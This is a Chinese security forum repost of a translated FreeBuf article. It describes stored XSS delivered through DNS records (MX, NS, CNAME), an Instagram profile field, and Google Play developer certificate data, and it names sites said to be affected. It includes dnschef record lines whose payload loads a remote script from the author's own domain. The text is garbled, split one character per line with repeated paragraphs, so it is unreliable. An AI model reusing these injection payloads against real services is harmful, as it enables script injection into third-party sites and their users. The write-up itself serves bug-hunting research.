论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[11636] 2017-08-07_我们要在任何可能的地方测试XSS漏洞
文档创建者:
s7ckTeam
浏览次数:
15
最后更新:
2025-01-18
漏洞
15 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2017-08-07_我们要在任何可能的地方测试XSS漏洞
我
们
要
在
任
何
可
能
的
地
方
测
试
X
S
S
漏
洞
A
l
p
h
a
_
h
4
c
k
F
r
e
e
B
u
f
2
0
1
7
-
0
8
-
0
7
在
这
篇
文
章
中
,
我
准
备
跟
大
家
讨
论
几
种
不
同
的
场
景
,
在
这
些
场
景
中
,
不
同
的
服
务
都
会
收
集
各
种
各
样
的
数
据
,
但
在
这
篇
文
章
中
,
我
准
备
跟
大
家
讨
论
几
种
不
同
的
场
景
,
在
这
些
场
景
中
,
不
同
的
服
务
都
会
收
集
各
种
各
样
的
数
据
,
但
它
们
又
无
法
正
确
地
去
处
理
这
些
数
据
。
在
某
些
情
况
下
,
数
据
采
用
的
是
安
全
格
式
存
储
和
传
输
的
,
但
是
由
于
数
据
的
解
它
们
又
无
法
正
确
地
去
处
理
这
些
数
据
。
在
某
些
情
况
下
,
数
据
采
用
的
是
安
全
格
式
存
储
和
传
输
的
,
但
是
由
于
数
据
的
解
析
操
作
以
及
进
一
步
处
理
的
过
程
中
存
在
安
全
问
题
,
将
导
致
无
害
的
字
符
串
变
成
攻
击
向
量
。
析
操
作
以
及
进
一
步
处
理
的
过
程
中
存
在
安
全
问
题
,
将
导
致
无
害
的
字
符
串
变
成
攻
击
向
量
。
X
S
S
和
和
D
N
S
如
果
你
在
搜
索
引
擎
中
搜
索
“
通
过
D
N
S
实
现
X
S
S
”
(
X
S
S
v
i
a
D
N
S
)
的
相
关
话
题
,
你
将
会
看
到
类
似
【
参
考
资
料
一
】
和
【
参
考
资
料
二
】
这
种
介
绍
如
何
在
T
X
T
记
录
中
传
递
X
S
S
攻
击
向
量
的
文
章
。
但
是
为
什
么
没
有
人
考
虑
过
其
他
类
型
的
记
录
呢
?
比
如
说
C
N
A
M
E
或
N
S
之
类
的
。
因
为
如
果
你
想
把
域
名
作
为
一
个
攻
击
向
量
的
话
,
你
还
需
要
创
建
自
己
的
N
S
服
务
器
。
也
许
使
用
D
N
S
C
H
E
F
会
是
一
个
好
主
意
。
我
使
用
的
子
域
名
是
h
a
c
k
.
b
o
0
o
m
.
r
u
(
任
何
子
域
名
都
可
以
)
,
并
且
将
我
的
I
P
设
置
成
了
该
域
名
的
N
S
服
务
器
。
接
下
来
修
改
d
n
s
c
h
e
f
.
i
n
i
并
完
成
d
n
s
c
h
e
f
的
配
置
,
添
加
下
列
记
录
:
如
果
某
个
在
线
服
务
得
到
了
D
N
S
数
据
之
后
还
将
它
们
打
印
在
了
屏
幕
上
,
只
能
说
明
该
服
务
忘
记
过
滤
掉
这
些
数
据
了
。
下
面
是
一
些
存
在
X
S
S
漏
洞
的
例
子
:
·
w
h
o
.
i
s
·
r
o
b
t
e
x
.
c
o
m
[
M
X
]
*
.
x
s
s
.
h
a
c
k
.
b
o
0
o
m
.
r
u
=
"
-
-
>
'
>
<
s
c
r
i
p
t
/
s
r
c
=
/
/
b
o
0
o
m
.
r
u
/
x
s
s
.
j
s
>
[
N
S
]
*
.
x
s
s
.
h
a
c
k
.
b
o
0
o
m
.
r
u
=
"
-
-
>
'
>
<
s
c
r
i
p
t
/
s
r
c
=
/
/
b
o
0
o
m
.
r
u
/
x
s
s
.
j
s
>
[
C
N
A
M
E
]
*
.
x
s
s
.
h
a
c
k
.
b
o
0
o
m
.
r
u
=
"
-
-
>
'
>
<
s
c
r
i
p
t
/
s
r
c
=
/
/
b
o
0
o
m
.
r
u
/
x
s
s
.
j
s
>
·
d
n
s
q
u
e
r
i
e
s
.
c
o
m
·
e
t
c
X
S
S
和
和
I
n
s
t
a
g
r
a
m
有
一
次
我
只
是
为
了
好
玩
,
然
后
将
一
段
X
S
S
P
a
y
l
o
a
d
添
加
到
了
我
I
n
s
t
a
g
r
a
m
的
个
人
状
态
中
。
一
开
始
没
发
生
什
么
有
趣
的
事
,
而
且
这
个
X
S
S
P
a
y
l
o
a
d
也
是
没
有
攻
击
性
的
。
但
是
之
后
我
发
现
,
这
个
X
S
S
P
a
y
l
o
a
d
竟
然
在
另
外
的
域
名
和
在
线
服
务
中
起
作
用
了
,
从
我
的
W
e
b
服
务
器
日
志
记
录
来
看
,
这
些
域
名
貌
似
指
向
的
是
社
交
网
络
解
析
器
和
一
些
分
析
服
务
。
下
面
给
出
的
是
其
中
部
分
示
例
:
·
f
i
n
d
g
r
a
m
.
m
e
·
i
m
g
r
a
b
.
c
o
m
·
i
n
s
t
a
g
y
.
c
o
m
·
i
c
o
n
o
s
q
u
a
r
e
.
c
o
m
·
t
o
f
o
.
m
e
·
p
h
o
t
o
.
s
h
·
g
r
a
m
o
s
p
h
e
r
e
.
c
o
m
不
过
其
中
有
一
部
分
已
经
修
复
了
这
个
漏
洞
。
X
S
S
和
和
G
o
o
g
l
e
P
l
a
y
最
近
,
@
B
l
a
c
k
2
F
a
n
给
我
发
了
一
条
信
息
,
并
问
我
能
不
能
够
在
G
o
o
g
l
e
P
l
a
y
应
用
商
店
上
传
存
在
X
S
S
漏
洞
的
A
n
d
r
o
i
d
A
p
p
。
我
当
时
都
不
知
道
竟
然
还
有
这
种
操
作
!
但
我
感
觉
可
行
。
于
是
我
自
己
弄
了
一
个
A
p
p
,
然
后
为
这
个
A
p
p
生
成
了
一
个
证
书
,
并
将
其
中
的
开
发
者
名
称
和
其
他
数
据
用
X
S
S
向
量
进
行
了
替
换
。
我
用
一
些
包
含
恶
意
代
码
的
文
件
以
及
文
件
路
径
组
成
了
一
个
有
效
的
页
面
标
签
,
并
从
我
自
己
的
域
名
加
载
相
应
的
脚
本
文
件
。
注
:
L
i
n
u
x
系
统
支
持
在
文
件
名
中
使
用
特
殊
字
符
。
虽
然
我
们
可
以
在
文
件
名
中
注
入
自
己
的
脚
本
代
码
,
但
坏
消
息
是
这
里
有
3
0
个
字
符
的
限
制
。
不
幸
的
是
,
我
手
上
可
以
使
用
的
域
名
都
有
点
长
,
而
且
那
些
只
有
一
个
或
两
个
字
符
的
域
名
估
计
都
已
经
被
注
册
掉
了
。
但
是
在
现
代
W
e
b
中
,
你
可
以
使
用
p
u
n
y
c
o
d
e
编
码
来
注
册
域
名
,
而
且
现
在
还
有
很
多
免
费
的
p
u
n
y
c
o
d
e
域
名
没
有
被
注
册
。
比
如
说
x
n
—
g
3
h
。
所
以
我
注
册
了
一
个
.
w
s
域
名
(
请
参
考
下
图
,
有
个
符
号
这
里
打
不
出
来
,
包
括
点
号
在
内
一
共
四
个
字
符
)
。
这
个
A
p
p
目
前
仍
然
可
以
在
G
o
o
g
l
e
P
l
a
y
应
用
商
店
中
找
到
【
传
送
门
】
,
但
是
它
随
时
可
能
被
删
掉
。
而
且
更
加
有
趣
的
是
,
当
我
将
这
个
A
p
p
上
传
到
V
i
r
u
s
T
o
t
a
l
之
后
,
其
中
的
X
S
S
向
量
竟
然
触
发
了
反
病
毒
产
品
W
e
b
端
面
板
中
的
漏
洞
。
哈
哈
哈
…
而
且
除
了
V
i
r
u
s
T
o
t
l
a
之
外
,
还
有
两
家
天
朝
的
安
全
厂
商
也
存
在
这
种
问
题
,
但
这
里
我
就
不
直
接
提
他
们
的
名
字
了
。
总
结
总
结
作
为
一
个
B
u
g
H
u
n
t
e
r
,
虽
然
我
这
一
次
的
发
现
没
能
拿
到
漏
洞
奖
金
,
但
希
望
可
以
给
大
家
提
供
一
种
新
的
挖
洞
思
路
,
其
实
我
也
只
是
为
了
好
玩
而
已
:
D
不
喜
勿
喷
*
参
考
来
源
:
参
考
来
源
:
b
o
0
o
m
,
,
F
B
小
编
小
编
A
l
p
h
a
_
h
4
c
k
编
译
,
转
载
请
注
明
来
自
编
译
,
转
载
请
注
明
来
自
F
r
e
e
B
u
f
.
C
O
M
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞